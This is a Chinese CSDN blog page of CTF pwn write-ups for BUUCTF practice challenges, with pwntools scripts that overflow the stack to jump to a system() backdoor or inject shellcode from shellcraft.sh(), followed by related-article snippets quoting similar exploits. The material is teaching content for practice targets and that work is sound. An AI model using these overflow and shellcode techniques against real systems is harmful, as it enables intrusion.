【无标题】

最新推荐文章于 2024-03-28 11:29:55 发布
最新推荐文章于 2024-03-28 11:29:55 发布
阅读量145 收藏
点赞数
文章标签: linux 运维 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/FUCKING12/article/details/127287599
版权

Do_u_know_how2_use_nc

请添加图片描述
程序执行就会得到shell。
直接使用nc工具连接。
请添加图片描述
类似这样。

ez_ret2shellcode

还是先下载下来在Linux上checksex一下,基本确实又是栈溢出了。
请添加图片描述
64位,所以我们用64位的IDA打开,没什么有用的信息,点开vulnerable_function函数
请添加图片描述
发现栈溢出的read函数,前面为0意味着标准读入,后面的长度也可以。没毛病就是这个地方了。
请添加图片描述
再翻翻其他函数,发现了我们想要的system函数。找到位置,和需要覆盖的返回地址。看过我之前的博文的人都知道,我比较喜欢system压参的位置。
请添加图片描述
请添加图片描述
再看看buf这个局部变量,先想要覆盖需要0x80 + 0x8的距离
请添加图片描述请添加图片描述

expolit

from pwn import *
p = remote("node3.buuoj.cn",xxxx)
ret_arr = 0X40059A
payload = 'a'*(0x80 + 0x8) + p64(ret_arr)
p.sendline(payload)
p.interactive()

请添加图片描述

ezstack_overflow

请添加图片描述
查看源码

请添加图片描述
可以判定是ret2shellcode+栈溢出题型。那么就需要用到shellcode。
32位:
print(shellcraft.sh()) 生成的是shell的汇编代码
print(asm(shellcraft.sh())) 生成的是shell的机械码

64位:
context.arch=“amd64”
print(shellcraft.sh()) 生成的是shell的汇编代码
print(asm(shellcraft.sh())) 生成的是shell的机械码
分析:
这个题有点坑的是gets函数。以前做的题都是一个参数,从终端获取字符串。这次还以为是把name的值赋给text,不需要终端获取字符串。然后刚开始的思路是shellcode+返回地址一步到位传给read函数,结果发现不通。。最后试验了一下gets(&a,&b)函数,在这里无视b,只用a这个参数,所以需要向终端发送两次payload。

from pwn import *
context.log_level="debug"
p=remote("node4.buuoj.cn",27143)

context.arch="amd64"
shellcode=asm(shellcraft.sh())

name=0x601080
p.recvuntil("name\n")

p.sendline(shellcode)

p.recvuntil("?\n")
payload=b"A"*0x28+p64(name)

p.sendline(payload)


p.interactive()

请添加图片描述

thna0s
关注
【BUUCTF - PWN】jarvisoj_level0
古月浪子的博客
04-05 713
checksec一下,栈溢出 IDA打开看看,很明显的溢出和后门函数,一道白给题 from pwn import * from LibcSearcher import * context.os='linux' context.arch='amd64' context.log_level='debug' sl=lambda x:io.sendline(x) rl=lambda :io.rec...
c#实现无标题栏窗口的拖动
09-05
本篇文章将详细讲解如何在C#中实现这种无标题栏窗口的拖动以及其他基本操作。 首先,为了实现无标题栏窗口的拖动,我们需要处理窗体的鼠标事件。窗体的`FormBorderStyle`属性应设置为`None`,这会去除窗体的边框和...
[BUUCTF-pwn]——jarvisoj_level0
Y_peak的博客
01-31 2016
[BUUCTF-pwn]——jarvisoj_level0 题目地址:https://buuoj.cn/challenges#jarvisoj_level0 题目: 还是先下载下来在Linux上checksex一下,基本确实又是栈溢出了。 64位,所以我们用64位的IDA打开,没什么有用的信息,点开vulnerable_function函数 发现栈溢出的read函数,前面为0意味着标准读入,后面的长度也可以。没毛病就是这个地方了。 再翻翻其他函数,发现了我们想要的system函数。找到位置,和需要覆
buuctf之jarvisoj_level0
最新发布
weixin_54452942的博客
03-28 1207
64位(system_addr+1)的奥秘
buuctf jarvisoj_level0
carol2358的博客
04-17 653
栈溢出,然后覆盖返回地址为system的地址。 from pwn import * from LibcSearcher import * context.os='linux' context.arch='amd64' context.log_level='debug' ru=lambda x:io.recvuntil(x) rl=lambda :io.recvline() ...
[BUUCTF]PWN------jarvisoj_level0
BangSen1的博客
01-18 353
jarvisoj_level0 例行检查,64bit,开启NX保护。 nc一下,出现了Hello world,接着让我们输入,没有有用的信息。 ‘用IDA打开,看到了/bin/sh 双击跟进,Ctrl+x查看被什么调用,找到了后门,所以shell_addr=0x400596 查看主函数,寻找输入点。 可以看到buf的大小是0x80,但它读取时只读了0x20,可以溢出,覆盖返回地址为后门地址既可 exp flag ...
Qt无标题窗口
05-21
在本文中,我们将深入探讨如何使用Qt框架创建一个无标题窗口,这在界面设计和自定义标题栏美化中非常有用。我们将关注`framelesswidget.cpp`、`main.cpp`、`framelesswidget.h`等核心文件,理解它们在实现无标题窗口...
C#创建无标题栏窗体
03-16
摘要:C#源码,菜单窗体,无标题栏窗体 C#创建无标题栏窗体源码,实际上是动态显示或隐藏窗体的标题栏,当隐藏的时候就类似窗体没有了标题栏,当显示标题栏的时候,鼠标按住标题栏即可拖动窗体,以前记得网友需要此...
Delphi实现拖动按钮移动无标题栏窗口
05-11
摘要:Delphi源码,界面编程,窗体拖动,无标题无标题栏的窗体的拖动功能实现,Delphi添加一个可拖动窗体的按钮,通过对此按钮的控制可移动窗体,实现按住标题栏移动窗口的功能,无标题栏也就不能显示最大化、最小化...
VC去掉'无标题'字样的方法.zip
11-21
在使用Visual C++进行编程时,我们经常会在创建新的窗口或者对话框时默认看到标题栏显示为“无标题”。这可能会对用户界面的美观性和专业性造成一定的影响。本资料包提供了一种方法来帮助开发者去掉这个“无标题”...
[BUUCTF]PWN8——jarvisoj_level0
mcmuyanga的博客
08-26 607
[BUUCTF]PWN8——jarvisoj_level0 题目网址:https://buuoj.cn/challenges#jarvisoj_level0 步骤: 例行检查,64位,开启了NX保护 nc一下,看看程序的大概执行流程,回显Hello,world之后让我们输入 用64位ida打开,shift+f12查看字符串,发现了 system 和 /bin/sh 双击跟进,ctrl+x找到调用 /bin/sh 的函数,找到了程序里的后门,shell_addr=0x400596 根据
CTF buuoj pwn-----第6题:jarvisoj_level0
bing_Max的博客
09-02 1087
CTF buuoj pwn-----第6题:ciscn_2019_n_1前言一、checksec 检测文件的保护机制二. 静态分析,IDA打开文件三. 编写EXP四. 运行EXP, 获取flag 前言 记录一下pwn的过程, 新手学习日记, 流水线记录. 打开题目, 连接靶机,下载文件level0 一、checksec 检测文件的保护机制 bing@bing-virtual-machine:~/pwn$ checksec ./level0 [*] '/home/bing/pwn/level0'
[buuctf]jarvisoj_level0
逆向萌新的博客
05-30 515
[buuctf]jarvisoj_level0
BUUCTF-Pwn-jarvisoj_level0
餐桌上的猫
02-12 350
题目截图 panyload=b’b’*(0x80+8)+p64(0x400596)
BUUCTF-PWN-jarvisoj_level0
Henlenl的博客
05-12 166
文章目录查看文件信息IDA 分析exp 查看文件信息 64位elf文件 IDA 分析 我们来到main()函数 再进入vulnerable_function()函数 典型的read()栈溢出漏洞,buf有0x80 [rbp + 80h] 所以 如果要覆盖的话 需要0x80 + rbp本身的8字节 同时我们发现 callsystem函数 地址为 0x400596,所以payload = ‘a’ * (0x80 + 8) + p64(0x400596) exp from pwn import *
BUUCTF jarvisoj_level0
、moddemod
06-11 690
exp from pwn import * context(log_level='debug', arch='amd64') p = remote('node3.buuoj.cn', 26990) proc_name = './level0' # p = process(proc_name) # elf = p.elf elf = ELF(proc_name) bin_sh_str = 0x400684 system_plt = elf.plt['system'] pop_rdi_ret = 0x40.
jarvis oj level0
发蝴蝶和大脑斧的博客
12-01 929
菜鸟入门,先从level0开始下手。 首先checksec,发现开启了nx保护。 Arch: amd64-64-little RELRO: No RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x400000) 拖进64位ida,查看vulnerable_function ssize_t...
jarvisoj——[XMAN]level0
王嘟嘟的博客
07-14 365
题目 Wp 拿下来之后发现是一个64位的,直接开ida main函数,现在对main函数已经很熟悉了 这里看到一个方法 这里按照规则覆盖即可。 脚本 from pwn import * sh=remote("pwn2.jarvisoj.com","9881") data="A"*136+p64(0x400596) sh.sendline(data) sh.interactive() sh.close() ...
Visual C++移除无标题窗口字样的技巧
资源摘要信息:"VC去掉'无标题'字样的方法.zip" 在使用Visual C++(简称VC++)进行Windows应用程序开发时,有时会发现新建的窗口默认标题栏显示为“无标题”,这通常是因为窗口的标题没有被正确设置。本压缩包提供的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值